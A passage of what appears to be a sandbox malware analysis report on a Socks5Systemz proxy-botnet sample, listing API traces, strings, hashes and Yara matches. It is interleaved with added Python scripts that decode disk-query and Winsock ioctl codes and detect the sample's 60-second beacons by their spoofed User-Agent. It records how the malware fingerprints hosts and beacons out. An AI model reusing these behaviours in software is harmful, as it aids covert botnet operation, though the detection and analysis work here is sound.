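SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
STORAGE_PROPERTY_QUERY_SIZE = 12   # DWORD PropertyId + DWORD QueryType + BYTE[1], padded


def parse_call(line):
    """Split one report line into api, module, raw argument strings and ref address."""
    m = CALL_RE.match(line.strip())
    if not m:
        raise ValueError("not a report call line: %r" % line)
    raw = m.group("args")
    return {"api": m.group("api"), "module": m.group("module"),
            "args": raw.split(",") if raw else [], "ref": int(m.group("ref"), 16)}


def arg_int(a):
    """Numeric arguments print as 8 hex digits; '?' marks a value the tracer did not recover."""
    return None if a == "?" else int(a, 16)


def decode_ioctl(code):
    """Break a DeviceIoControl control code into its CTL_CODE fields."""
    return {"name": KNOWN_IOCTLS.get(code, "unknown"),
            "device_type": DEVICE_TYPES.get(code >> 16, hex(code >> 16)),
            "function": (code >> 2) & 0xFFF,
            "method": METHODS[code & 3],
            "access": ACCESS[(code >> 14) & 3]}


def decode_createfile(args):
    """Name the CreateFileA flags (path, desired access, share mode, disposition)."""
    access, share, disp = arg_int(args[1]), arg_int(args[2]), arg_int(args[4])
    return {"path": args[0],
            "access": [n for bit, n in GENERIC.items() if access & bit]
                      or ["0 (no data access: device queries only)"],
            "share": [n for bit, n in SHARE.items() if share & bit],
            "disposition": DISPOSITION.get(disp, hex(disp))}


def findings(lines):
    """Return the host-identification patterns present in a list of report call lines."""
    calls = {c["api"]: c for c in (parse_call(l) for l in lines)}
    out = []
    ll, gpa = calls.get("LoadLibraryA"), calls.get("GetProcAddress")
    if ll and gpa and ll["args"][0].lower() == "iphlpapi.dll" and gpa["args"][-1] == "GetAdaptersInfo":
        out.append("adapter enumeration via dynamically resolved GetAdaptersInfo")
    cf = calls.get("CreateFileA")
    if cf and cf["args"][0].startswith(r"\\.\PhysicalDrive"):
        d = decode_createfile(cf["args"])
        if arg_int(cf["args"][1]) == 0:
            out.append("raw disk opened %s with dwDesiredAccess=0: "
                       "the handle can issue IOCTLs but cannot read or write sectors" % d["disposition"])
    dio = calls.get("DeviceIoControl")
    if dio:
        info = decode_ioctl(arg_int(dio["args"][1]))
        if info["name"] == "IOCTL_STORAGE_QUERY_PROPERTY" and arg_int(dio["args"][3]) == STORAGE_PROPERTY_QUERY_SIZE:
            out.append("IOCTL_STORAGE_QUERY_PROPERTY with a 12-byte STORAGE_PROPERTY_QUERY: "
                       "disk descriptor (vendor/product/serial) query")
    return out


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        c = parse_call(line)
        if c["api"] == "DeviceIoControl":
            print(c["api"], decode_ioctl(arg_int(c["args"][1])))
        elif c["api"] == "CreateFileA":
            print(c["api"], decode_createfile(c["args"]))
    for f in findings(SAMPLE_LINES):
        print("-", f)
```

Feed it the call lines of any entry: `findings` returns an empty list when none of the patterns is present, and control codes not in the small lookup table still decode into their device type, function number, method and access fields, which is usually enough to identify them from the Windows headers.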

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02A11D11
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A11D23
                                                                                                                                                            • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02A11D59
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A11D6B
                                                                                                                                                          • __beginthreadex.LIBCMT ref: 02A11DB1
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A11DC6
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A11DDD
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A11DEC
                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02A11E14
                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02A11E1B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                                                                                                                          • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                                                                          • API String ID: 4246062733-3017686385
                                                                                                                                                          • Opcode ID: b5cfc11a0330b2099b58e4293af47ca677a17697ba85c2d086ef1e6820248ba1
                                                                                                                                                          • Instruction ID: aba73c35b2ce555708359ea9c92bea43c52cf6548dfa95c01b730eeb4fdeda14
                                                                                                                                                          • Opcode Fuzzy Hash: b5cfc11a0330b2099b58e4293af47ca677a17697ba85c2d086ef1e6820248ba1
                                                                                                                                                          • Instruction Fuzzy Hash: 89316BB1A403119FD700EF24CC88B2BBBA5EF85764F104969F9599B290DF709949CF92
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A14E1D
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A14E49
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A14E55
                                                                                                                                                            • Part of subcall function 02A14C7F: __EH_prolog.LIBCMT ref: 02A14C84
                                                                                                                                                            • Part of subcall function 02A14C7F: InterlockedExchange.KERNEL32(?,00000000), ref: 02A14D84
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A14F25
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A14F2B
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A14F32
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A14F38
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A15139
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A1513F
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A1514A
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A15153
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2062355503-0
                                                                                                                                                          • Opcode ID: 9eede100a4286a0b7d8aceee9877cde53c1b9a8aeb32f448e388d6e811751cc6
                                                                                                                                                          • Instruction ID: 4dab5952b90e97f4a50bfa28aa27afef09f36034cc83a9b5dd7c16fcd7921ee3
                                                                                                                                                          • Opcode Fuzzy Hash: 9eede100a4286a0b7d8aceee9877cde53c1b9a8aeb32f448e388d6e811751cc6
                                                                                                                                                          • Instruction Fuzzy Hash: D7B15971D4025DEEEF21DFA4CD90BEDBBB5AF09324F10409AE405A6280DF745A49CF96
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

Control-flow graph (interactive rendering not reproduced): basic blocks 401f64-40209a. Path: FindResourceA (401f64; one branch goes straight to the return at 402096) → GetLastError and SizeofResource (401f86) → LoadResource, LockResource, GlobalAlloc and two calls to 402910 (401fa6-401fec) → a loop at 401fee-401ff9 → GetTickCount (401ffb) → loops over 402005-402030 and 40203a-402051 → GlobalAlloc and call 401c26 (402053-402083) → return at 402096.
                                                                                                                                                          APIs
                                                                                                                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                                                                                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 564119183-0
                                                                                                                                                          • Opcode ID: beb4d93e6ab0000654ca0b4ef6e0369b4b44b9707bf6409794ee70763ef4fb7e
                                                                                                                                                          • Instruction ID: 463a3d7b41c8cda22d33258f608925a12b9792281116504224950c64902584c3
                                                                                                                                                          • Opcode Fuzzy Hash: beb4d93e6ab0000654ca0b4ef6e0369b4b44b9707bf6409794ee70763ef4fb7e
                                                                                                                                                          • Instruction Fuzzy Hash: 48315B31A40251AFDB109FB99E489AF7B78EF45344F10807AFE46F7291D6748941C7A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

(Graph rendered in the original report; the node listing and the Executed / Not Executed legend are omitted here. Basic blocks 02A16745-02A17C7B. API calls placed on the graph: Sleep, RtlEnterCriticalSection, RtlLeaveCriticalSection, InternetOpenA, InternetSetOptionA (x3), InternetOpenUrlA, InternetReadFile, InternetCloseHandle.)
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNELBASE(0000EA60), ref: 02A16759
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A16764
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A16775
                                                                                                                                                          • _free.LIBCMT ref: 02A17BA1
                                                                                                                                                          Strings
                                                                                                                                                          • urls, xrefs: 02A17B87
                                                                                                                                                          • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02A1678A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeaveSleep_free
                                                                                                                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$urls
                                                                                                                                                          • API String ID: 2653569029-4235545730
                                                                                                                                                          • Opcode ID: 781a41c46c1430b5d680fe173145c7247270383075dfe0a137bba7870ee07f3c
                                                                                                                                                          • Instruction ID: e3cde9cacf6bb60b21dfa41ebe8dcf4516083b283b57a8a9e2b8d717d7ae8d67
                                                                                                                                                          • Opcode Fuzzy Hash: 781a41c46c1430b5d680fe173145c7247270383075dfe0a137bba7870ee07f3c
                                                                                                                                                          • Instruction Fuzzy Hash: D0315B729083909FD7119B389D8475BBBA1EF87730F14049DF5929B282DF609846C796
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%
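The function above builds the User-Agent "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)" and sleeps 0xEA60 ms (60 s) between passes of its WinINet fetch loop (InternetOpenA, InternetSetOptionA x3, InternetOpenUrlA, InternetReadFile). Both details are usable on the network side: no Windows build reports "Windows NT 9.0" (real values are 5.x, 6.x and 10.0), and a fixed 60 s cadence to one host is a beacon pattern. The script below is an added detection example, not code from the Joe Sandbox report or from the sample; the proxy-log format, the hostnames and the sample log lines are constructed for this example.

```python
"""Flag Socks5Systemz-style HTTP beacons in proxy logs (added example).

The UA string and the 60 s sleep come from the report entry above. The log
line format (ISO timestamp, client IP, destination host, quoted User-Agent)
and the SAMPLE_LOG lines are constructed for this example.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Windows NT versions that real Microsoft clients report in User-Agent strings.
REAL_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}

# Exact UA the sample builds (string xref at 02A1678A in the report).
SOCKS5SYSTEMZ_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"

NT_RE = re.compile(r"Windows NT (\d+\.\d+)")

# Constructed log format (assumption): "<iso-timestamp> <client> <host> \"<user-agent>\"".
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')


def parse_line(line):
    """Return (timestamp, client, host, user_agent), or None if the line does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)


def is_suspicious_ua(ua):
    """True for the sample's exact UA, or any UA claiming a Windows NT version that does not exist."""
    if ua == SOCKS5SYSTEMZ_UA:
        return True
    m = NT_RE.search(ua)
    return bool(m) and m.group(1) not in REAL_NT_VERSIONS


def find_beacons(lines, period_s=60.0, tolerance_s=5.0, min_hits=3):
    """Group requests by (client, host) and report pairs that recur at a fixed period
    (period_s +/- tolerance_s, matching the sample's Sleep(0xEA60)) or use a bad UA."""
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, host, ua = rec
        buckets[(client, host)].append((ts, ua))

    findings = []
    for (client, host), reqs in buckets.items():
        if len(reqs) < min_hits:
            continue
        reqs.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        regular = all(abs(g - period_s) <= tolerance_s for g in gaps)
        bad_ua = any(is_suspicious_ua(ua) for _, ua in reqs)
        if regular or bad_ua:
            findings.append({"client": client, "host": host, "hits": len(reqs),
                             "median_interval_s": statistics.median(gaps),
                             "regular": regular, "bad_ua": bad_ua})
    return findings


# Constructed sample log: one 60 s beacon using the sample's UA, plus benign browsing.
_FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/121.0"
SAMPLE_LOG = [
    '2024-01-15T10:00:00 10.0.0.5 update-host.example "' + SOCKS5SYSTEMZ_UA + '"',
    '2024-01-15T10:01:00 10.0.0.5 update-host.example "' + SOCKS5SYSTEMZ_UA + '"',
    '2024-01-15T10:02:01 10.0.0.5 update-host.example "' + SOCKS5SYSTEMZ_UA + '"',
    '2024-01-15T10:03:00 10.0.0.5 update-host.example "' + SOCKS5SYSTEMZ_UA + '"',
    '2024-01-15T10:00:13 10.0.0.7 www.example.org "' + _FIREFOX_UA + '"',
    '2024-01-15T10:00:41 10.0.0.7 www.example.org "' + _FIREFOX_UA + '"',
    '2024-01-15T10:07:02 10.0.0.7 www.example.org "' + _FIREFOX_UA + '"',
]

if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG):
        print(finding)
```

The cadence check alone will also catch legitimate pollers (update checkers, monitoring agents), so in practice the UA test is the high-confidence signal and the interval is corroboration; tune `period_s` to the sleep value observed in the sample you are hunting.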

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A12706
                                                                                                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02A1272B
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A35AD3), ref: 02A12738
                                                                                                                                                            • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
                                                                                                                                                          • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02A12778
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A127D9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                                                                          • String ID: timer
                                                                                                                                                          • API String ID: 4293676635-1792073242
                                                                                                                                                          • Opcode ID: b8c65b3f222d0b9676795beaf6eafc05392d9e7f329b1527e3d86d97a643d8a6
                                                                                                                                                          • Instruction ID: f137d2d2bf49c6e8c367a073c137ba5dabe48ee8db376f8fcc8e7a6e86e3101e
                                                                                                                                                          • Opcode Fuzzy Hash: b8c65b3f222d0b9676795beaf6eafc05392d9e7f329b1527e3d86d97a643d8a6
                                                                                                                                                          • Instruction Fuzzy Hash: DC317AB1944716EFD310DF25CA84B27BBE8FF49764F004A2AF95582A80EB70E815CF91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

(Graph rendered in the original report; the node listing and the Executed / Not Executed legend are omitted here. Basic blocks 02A12B95-02A12D38. API calls placed on the graph: WSASetLastError, WSARecv, select.)
                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A12BE4
                                                                                                                                                          • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02A12C07
                                                                                                                                                            • Part of subcall function 02A1A489: WSAGetLastError.WS2_32(00000000,?,?,02A12A51), ref: 02A1A497
                                                                                                                                                          • WSASetLastError.WS2_32 ref: 02A12CD3
                                                                                                                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02A12CE7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$Recvselect
                                                                                                                                                          • String ID: 3'
                                                                                                                                                          • API String ID: 886190287-280543908
                                                                                                                                                          • Opcode ID: fc8158c8161d1483ed6d2d61a001a317f271c27a25e7468e0aa56db3c9f86c2a
                                                                                                                                                          • Instruction ID: 7c2a8ae1fca64dec61dfb894410c480e5921474a43ba0e4e8316224f8f127319
                                                                                                                                                          • Opcode Fuzzy Hash: fc8158c8161d1483ed6d2d61a001a317f271c27a25e7468e0aa56db3c9f86c2a
                                                                                                                                                          • Instruction Fuzzy Hash: 3A418AB1A083168FD7209F74CA4476BBBE9AF88364F10091EE999C7280EF70D544CB92
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetVersion.KERNEL32 ref: 00402F48
                                                                                                                                                            • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                                                                                                            • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
                                                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00402F96
                                                                                                                                                          • GetStartupInfoA.KERNEL32(?), ref: 00402FC1
                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
                                                                                                                                                            • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                                                                          • String ID: x5}
                                                                                                                                                          • API String ID: 2057626494-690368461
                                                                                                                                                          • Opcode ID: c877abccd7b017b2008373a683c45a85b37785b71fb7751b95783a0f91bffb14
                                                                                                                                                          • Instruction ID: cc19e24f17b4650914cb2b9af9e4d353f3e23d4ad16f4765f21c486f210011ea
                                                                                                                                                          • Opcode Fuzzy Hash: c877abccd7b017b2008373a683c45a85b37785b71fb7751b95783a0f91bffb14
                                                                                                                                                          • Instruction Fuzzy Hash: F5219CB09407059ADB08EFA6DE09A6E7BB9EB44304F10413EFA05BB2D1DB384450DB99
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

(Graph rendered in the original report; the node listing and the Executed / Not Executed legend are omitted here. Basic blocks 02A129EE-02A12AC6. API calls placed on the graph: WSASetLastError, closesocket, ioctlsocket.)
                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A12A3B
                                                                                                                                                          • closesocket.WS2_32 ref: 02A12A42
                                                                                                                                                          • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02A12A89
                                                                                                                                                          • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02A12A97
                                                                                                                                                          • closesocket.WS2_32 ref: 02A12A9E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1561005644-0
                                                                                                                                                          • Opcode ID: d29cfdb8e1a95843effa95dc232d8bd60f02b5f34a146c60aa45c92cfd3dd80e
                                                                                                                                                          • Instruction ID: 778d08f6d09e3bdb80be6d4586568dc929f59e5c9dad8487f78920757a1cfeda
                                                                                                                                                          • Opcode Fuzzy Hash: d29cfdb8e1a95843effa95dc232d8bd60f02b5f34a146c60aa45c92cfd3dd80e
                                                                                                                                                          • Instruction Fuzzy Hash: 462108B1A00225AFDB209BF89E44B6AB7E9AF44325F14456AEC15C3181EF70C945CB50
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%
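The ioctlsocket command 8004667E in the entry above is a Winsock ioctl code built with the _IOW macro from winsock2.h, and decoding it gives FIONBIO (group 'f', number 126, 4-byte parameter copied in). The decoder below is an added example, not code from the report or the sample: it reimplements the winsock2.h _IOR/_IOW encoding and names the classic FIO*/SIOCATMARK commands. The "blocking mode" reading in `explain_call` assumes the 0 shown as the third argument in the trace is the dereferenced u_long rather than a null pointer; treat that as an assumption, not something the report states.

```python
"""Decode Winsock ioctlsocket() command codes (added example, not from the report).

Layout of a Winsock ioctl code (winsock2.h):
  bits 31..29  direction (IOC_IN / IOC_OUT / IOC_VOID)
  bits 22..16  parameter size & IOCPARM_MASK
  bits 15..8   group character
  bits  7..0   command number
"""

IOCPARM_MASK = 0x7F
IOC_VOID = 0x20000000     # no parameters
IOC_OUT = 0x40000000      # copy out parameters
IOC_IN = 0x80000000       # copy in parameters
IOC_INOUT = IOC_IN | IOC_OUT
SIZEOF_ULONG = 4          # u_long is 32-bit on Windows, x86 and x64 alike


def _ioc(direction, group, num, size):
    return direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


def ior(group, num, size=SIZEOF_ULONG):
    """_IOR(x, y, t): command that copies a t-sized value out to the caller."""
    return _ioc(IOC_OUT, group, num, size)


def iow(group, num, size=SIZEOF_ULONG):
    """_IOW(x, y, t): command that copies a t-sized value in from the caller."""
    return _ioc(IOC_IN, group, num, size)


# Standard Winsock commands, defined exactly as winsock2.h defines them.
KNOWN = {
    ior("f", 127): "FIONREAD",   # bytes available to read      (0x4004667F)
    iow("f", 126): "FIONBIO",    # set/clear non-blocking mode  (0x8004667E)
    iow("f", 125): "FIOASYNC",   # set/clear async I/O          (0x8004667D)
    ior("s", 7): "SIOCATMARK",   # at OOB mark?                 (0x40047307)
}

_DIRECTIONS = {IOC_IN: "in", IOC_OUT: "out", IOC_INOUT: "inout", IOC_VOID: "void"}


def decode_ioctl(code):
    """Split a raw ioctl code into its fields and look up its name."""
    return {
        "code": f"0x{code:08X}",
        "name": KNOWN.get(code, "?"),
        "direction": _DIRECTIONS.get(code & 0xE0000000, "unknown"),
        "size": (code >> 16) & IOCPARM_MASK,
        "group": chr((code >> 8) & 0xFF),
        "number": code & 0xFF,
    }


def explain_call(code, arg):
    """Summarise an ioctlsocket(s, code, &arg) call as it appears in an API trace.

    `arg` is taken to be the u_long the pointer refers to (assumption for the
    trace above). For FIONBIO, 0 restores blocking mode; non-zero enables
    non-blocking mode.
    """
    d = decode_ioctl(code)
    if d["name"] == "FIONBIO":
        mode = "blocking" if arg == 0 else "non-blocking"
        return f"FIONBIO: socket set to {mode} mode"
    return f"{d['name']} ({d['code']}, {d['direction']}, group '{d['group']}', #{d['number']}, arg={arg})"


if __name__ == "__main__":
    print(decode_ioctl(0x8004667E))
    print(explain_call(0x8004667E, 0))
```

Switching a socket back to blocking mode right before closesocket is a common pattern in hand-written Winsock code (it lets closesocket and any pending SO_LINGER handling complete synchronously), so on its own it is not an indicator; its value here is in confirming the sample manages its own connection pool rather than relying on WinINet for the SOCKS side.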

Control-flow Graph

(Graph rendered in the original report; the node listing and the Executed / Not Executed legend are omitted here. Basic blocks 02A11BA7-02A11C6E. API calls placed on the graph: RtlEnterCriticalSection, RtlLeaveCriticalSection.)
APIs
• __EH_prolog.LIBCMT ref: 02A11BAC
• RtlEnterCriticalSection.NTDLL ref: 02A11BBC
• RtlLeaveCriticalSection.NTDLL ref: 02A11BEA
• RtlEnterCriticalSection.NTDLL ref: 02A11C13
• RtlLeaveCriticalSection.NTDLL ref: 02A11C56
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave$H_prolog
• String ID:
• API String ID: 1633115879-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSASetLastError.WS2_32(00000000), ref: 02A12EEE
• WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02A12EFD
• WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02A12F0C
• setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02A12F36
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Socketsetsockopt
• String ID:
• API String ID: 2093263913-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02A12D39: WSASetLastError.WS2_32(00000000), ref: 02A12D47
  • Part of subcall function 02A12D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02A12D5C
• WSASetLastError.WS2_32(00000000), ref: 02A12E6D
• select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02A12E83
Strings
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Sendselect
• String ID: 3'
• API String ID: 2958345159-280543908
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSASetLastError.WS2_32(00000000), ref: 02A12AEA
• connect.WS2_32(?,?,?), ref: 02A12AF5
Strings
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: ErrorLastconnect
• String ID: 3'
• API String ID: 374722065-280543908
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
Uniqueness

